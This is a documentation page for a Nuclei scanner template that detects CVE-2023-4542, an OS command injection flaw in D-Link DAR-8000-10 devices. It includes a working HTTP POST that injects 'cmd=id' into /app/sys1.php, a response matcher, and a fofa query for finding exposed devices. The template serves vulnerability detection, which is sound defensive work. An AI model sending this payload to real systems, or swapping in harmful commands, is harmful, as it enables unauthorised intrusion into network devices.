Skip to content
Nuclei Templates

D-Link DAR-8000-10 - Command Injection

ID: CVE-2023-4542

Severity: critical

Author: pussycat0x

Tags: cve,cve2023,dlink

Description

Section titled “Description”

D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.

YAML Source

Section titled “YAML Source”
id: CVE-2023-4542


info:
  name: D-Link DAR-8000-10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    D-Link DAR-8000-10 version has an operating system command injection vulnerability. The vulnerability originates from the parameter id of the file /app/sys1.php which can lead to operating system command injection.
  reference:
    - https://github.com/20142995/sectool
    - https://github.com/tanjiti/sec_profile
    - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
    - https://vuldb.com/?ctiid.238047
    - https://vuldb.com/?id.238047
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4542
    cwe-id: CWE-78
    epss-score: 0.90977
    epss-percentile: 0.9884
    cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dlink
    product: dar-8000-10_firmware
    fofa-query:
      - body="DAR-8000-10" && title="D-Link"
      - body="dar-8000-10" && title="d-link"
  tags: cve,cve2023,dlink


http:
  - raw:
      - |
        POST /app/sys1.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded


        cmd=id


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221008fa46b638ab8922fa6b2210a6477f1c8486504f6e30b9010faf714ce59d8d81c02205a8ca4cfb4e7e1b77ecb72480fb04b646608c227dce9c4c8fd4e68ce3af82df0:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4542.yaml"

View on Github